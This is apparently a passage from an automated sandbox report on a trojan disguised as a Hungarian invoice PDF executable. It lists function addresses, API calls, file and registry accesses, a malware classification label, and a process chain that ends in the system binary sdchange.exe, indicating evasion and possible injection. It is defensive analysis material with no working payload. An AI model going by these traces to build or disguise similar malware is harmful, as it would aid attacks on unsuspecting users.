            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F1725_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A516C5_2_335A516C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357B1B05_2_3357B1B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362F0E05_2_3362F0E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336270E95_2_336270E9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C05_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F0CC5_2_3361F0CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362F7B05_2_3362F7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336275715_2_33627571
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360D5B05_2_3360D5B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335614605_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362F43F5_2_3362F43F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362FB765_2_3362FB76
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335ADBF95_2_335ADBF9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E5BF05_2_335E5BF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358FB805_2_3358FB80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33627A465_2_33627A46
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362FA495_2_3362FA49
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E3A6C5_2_335E3A6C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361DAC65_2_3361DAC6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33611AA35_2_33611AA3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360DAAC5_2_3360DAAC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B5AA05_2_335B5AA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335799505_2_33579950
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B9505_2_3358B950
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336059105_2_33605910
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD8005_2_335DD800
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335738E05_2_335738E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362FF095_2_3362FF09
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571F925_2_33571F92
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362FFB15_2_3362FFB1
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33579EB05_2_33579EB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33627D735_2_33627D73
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573D405_2_33573D40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33621D5A5_2_33621D5A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358FDC05_2_3358FDC0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E9C325_2_335E9C32
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362FCF25_2_3362FCF2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362A3525_2_3362A352
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336303E65_2_336303E6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357E3F05_2_3357E3F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336102745_2_33610274
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F02C05_2_335F02C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F81585_2_335F8158
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335601005_2_33560100
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360A1185_2_3360A118
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336281CC5_2_336281CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336241A25_2_336241A2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336301AA5_2_336301AA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336020005_2_33602000
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335947505_2_33594750
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335707705_2_33570770
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356C7C05_2_3356C7C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358C6E05_2_3358C6E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335705355_2_33570535
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336305915_2_33630591
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336224465_2_33622446
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336144205_2_33614420
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361E4F65_2_3361E4F6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362AB405_2_3362AB40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33626BD75_2_33626BD7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356EA805_2_3356EA80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335869625_2_33586962
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363A9A65_2_3363A9A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335729A05_2_335729A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335728405_2_33572840
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357A8405_2_3357A840
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359E8F05_2_3359E8F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335568B85_2_335568B8
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E4F405_2_335E4F40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33612F305_2_33612F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33590F305_2_33590F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B2F285_2_335B2F28
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33562FC85_2_33562FC8
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357CFE05_2_3357CFE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EEFA05_2_335EEFA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33570E595_2_33570E59
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362EE265_2_3362EE26
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362EEDB5_2_3362EEDB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33582E905_2_33582E90
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362CE935_2_3362CE93
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357AD005_2_3357AD00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360CD1F5_2_3360CD1F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356ADE05_2_3356ADE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33588DBF5_2_33588DBF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33570C005_2_33570C00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33560CF25_2_33560CF2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33610CB55_2_33610CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2E4F67_2_04C2E4F6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C324467_2_04C32446
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C244207_2_04C24420
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C405917_2_04C40591
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B805357_2_04B80535
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9C6E07_2_04B9C6E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7C7C07_2_04B7C7C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B807707_2_04B80770
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BA47507_2_04BA4750
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C120007_2_04C12000
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C381CC7_2_04C381CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C341A27_2_04C341A2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C401AA7_2_04C401AA
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C081587_2_04C08158
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B701007_2_04B70100
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1A1187_2_04C1A118
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C002C07_2_04C002C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C202747_2_04C20274
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C403E67_2_04C403E6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8E3F07_2_04B8E3F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3A3527_2_04C3A352
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B70CF27_2_04B70CF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C20CB57_2_04C20CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B80C007_2_04B80C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B98DBF7_2_04B98DBF
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7ADE07_2_04B7ADE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8AD007_2_04B8AD00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1CD1F7_2_04C1CD1F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3EEDB7_2_04C3EEDB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B92E907_2_04B92E90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3CE937_2_04C3CE93
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B80E597_2_04B80E59
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3EE267_2_04C3EE26
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BFEFA07_2_04BFEFA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B72FC87_2_04B72FC8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BA0F307_2_04BA0F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC2F287_2_04BC2F28
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C22F307_2_04C22F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF4F407_2_04BF4F40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B668B87_2_04B668B8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BAE8F07_2_04BAE8F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B828407_2_04B82840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8A8407_2_04B8A840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B829A07_2_04B829A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C4A9A67_2_04C4A9A6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B969627_2_04B96962
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7EA807_2_04B7EA80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C36BD77_2_04C36BD7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3AB407_2_04C3AB40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B714607_2_04B71460
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F43F7_2_04C3F43F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C495C37_2_04C495C3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1D5B07_2_04C1D5B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C375717_2_04C37571
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C316CC7_2_04C316CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC56307_2_04BC5630
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F7B07_2_04C3F7B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2F0CC7_2_04C2F0CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F0E07_2_04C3F0E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C370E97_2_04C370E9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B870C07_2_04B870C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8B1B07_2_04B8B1B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C4B16B7_2_04C4B16B
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B6F1727_2_04B6F172
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB516C7_2_04BB516C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B852A07_2_04B852A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C212ED7_2_04C212ED
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9D2F07_2_04B9D2F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9B2C07_2_04B9B2C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC739A7_2_04BC739A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3132D7_2_04C3132D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B6D34C7_2_04B6D34C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FCF27_2_04C3FCF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF9C327_2_04BF9C32
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9FDC07_2_04B9FDC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C31D5A7_2_04C31D5A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C37D737_2_04C37D73
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B83D407_2_04B83D40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B89EB07_2_04B89EB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B81F927_2_04B81F92
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B43FD57_2_04B43FD5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B43FD27_2_04B43FD2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FFB17_2_04C3FFB1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FF097_2_04C3FF09
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B838E07_2_04B838E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BED8007_2_04BED800
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C159107_2_04C15910
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B899507_2_04B89950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9B9507_2_04B9B950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2DAC67_2_04C2DAC6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC5AA07_2_04BC5AA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C21AA37_2_04C21AA3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1DAAC7_2_04C1DAAC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C37A467_2_04C37A46
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FA497_2_04C3FA49
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF3A6C7_2_04BF3A6C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9FB807_2_04B9FB80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BBDBF97_2_04BBDBF9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF5BF07_2_04BF5BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FB767_2_04C3FB76
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C620807_2_02C62080
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5CF407_2_02C5CF40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5CF3A7_2_02C5CF3A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B29F7_2_02C5B29F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B2A07_2_02C5B2A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C513A17_2_02C513A1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B1507_2_02C5B150
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5D1607_2_02C5D160
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C657407_2_02C65740
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C638F97_2_02C638F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C639427_2_02C63942
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C639407_2_02C63940
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C7BEB07_2_02C7BEB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: String function: 335DEA12 appears 82 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: String function: 3355B970 appears 262 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: String function: 335B7E54 appears 100 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: String function: 335EF290 appears 103 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: String function: 335A5130 appears 58 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04BEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04BFF290 appears 103 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04BC7E54 appears 107 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04B6B970 appears 262 times
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 04BB5130 appears 58 times
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.00000000334B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033801000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000332FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal84.troj.evad.winEXE@5/9@2/1
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nss4058.tmpJump to behavior
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile read: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
